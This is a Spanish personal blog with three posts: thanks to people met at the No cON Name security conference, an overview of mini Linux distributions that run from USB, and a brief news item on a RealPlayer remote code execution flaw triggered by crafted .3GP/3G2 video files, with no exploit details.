Fue una magnifica oportunidad para mi, pude aprender muchísimo y afianzar algunas expectativas que tenia en mente. También me permitió conocer a gente genial como Juan Miguel Aguayo Sánchez (JuanMi) de [Informatica64] que estaba a mi lado vendiendo sus libros, puede cruzar unas palabras con Chema Alono de [Elladodelmal] y trabajar junto a Nico o Daniel de la organización de la No cON Name (Tambien quiero dar las gracias a la chica que me ayudó con el tema de las camisetas. No lo pregunté ni el nombre a la pobre). Todos grandes profesionales que me ayudaron muchísimo con todo el tema. Gracias a todos!!

Me quedo en la memoria con muchos buenos momentos de la No cON pero también con un gusto de boca agridulce al finalizar estos 2 días geniales.

Por ultimo me gustaría agradecer y dar un abrazo como se merece a Mercè Molist. La cual confió en mi y me dio esta oportunidad que tanto quería  No supe como despedirme de ella en la No cON (me vi demasiado abrumado), así que desde aquí quiero felicitarte por tu trabajo en el libro y con todo el proyecto que [Hackstory]  requiere. Ánimos Mercè se que trabajas muy duro para el libro que todos estamos esperando. Adelante!!

sábado, 3 de noviembre de 2012

USB Linux Inside --> Mini distribuciones Linux.

Hace ya muchísimo tiempo que ando enredando con estos minis sistemas operativos. Posiblemente sea la parte a la que le he dedicado mas tiempo, vamos que me he puesto mas las pilas en intentar entenderlo y modificarlas a mi antojo.

Una Mini distribución Linux es aquella destinada a incorporar un sistema operativo completo a unidades portátiles de poca capacidad. Este tipo de distribuciones logran poder trabajar en un entorno Linux desde un USB / Disquete logran ejecutarse en modo ram sin tocar para nada el disco duro del equipo que estemos utilizando y, dependiendo de lo lista que sea la distribución, dejarnos acceder al disco si lo necesitamos.

Todas las mini distribuciones andan alrededor de estas características: 

  • Mínima ocupación: entre 1Mb y 50Mb
  • Mínima ocupación de recursos: 4-8 Mb RAM y procesador i386
  • Uso de memoria RAM como sistema de ficheros: /dev/ram-n
  • No necesitan normalmente disco duro:
  • Suelen permitir conectar el equipo a la red e incluyen clientes y a veces servidores de servicios básicos como ftp, http, telnet u otros
  • Instalaciones desde MS-DOS, GNU/Linux, o sin necesidad de sistema operativo, como los sistemas LiveCD.
  • Instalación muy sencilla.
  • Discos auxiliares para añadir más funcionalidades.
(copia pega de las caracteristicas de [Usemos Linux])

A mi parecer, si quiero que un sistema sea portable entre 1Mb y 50Mb (dependiendo si lo quieres con interfaz gráfica o en linea de comandos) es mas que razonable para poder editar mis documentos, moverme por internet, etc sin entrar en contacto con los virus que puedan llegar a almacenar en el disco duro el amigo.  Ademas de que te solucionan la papeleta a la hora de recatar archivos cuando el sistema operativo de alguien si backups ni nada estalla en mil pedazos.

En este sentido Linux pasa de ser algo que no pondría en mi ordenador de uso habitual a ser una belleza en miniatura. (si, me habéis pillado mantengo mi sistema operativo por los videojuegos xD) . Así que tenemos que dejar de mirar a las diferentes distribuciones Linux con ojos raros por que aveces nos podemos llevar sorpresas muy agradables.






viernes, 2 de noviembre de 2012

Vulnerabilidad: Ejecución remota de código en Real Player

El reproductor multiformato de la empresa  RealNetworks ha sido machacado por una vulnerabilidad producida por un fallo al procesar ficheros .3GP y 3G2.


Este fallo pude provocar un desbordamiento de memoria y permitir la escritura en zonas prohibidas. A partir de aquí ya os podéis imaginar lo que se puede hacer al escribir código de manera remota, ademas este código tendría los permisos de tu reproductor así que lo aceptarías de buena gana. La parte "buena" es que solo funciona si se ha manipulado un archivo de vídeo para activar la vulnerabilidad. 

Este fallo afecta a la versión actual de RealPlayer, la 15.0.6.14

Me parece una vulnerabilidad muy chula por la manera que tiene de activarse nunca he manipulado un fichero de vídeo así, tiene que ser divertido.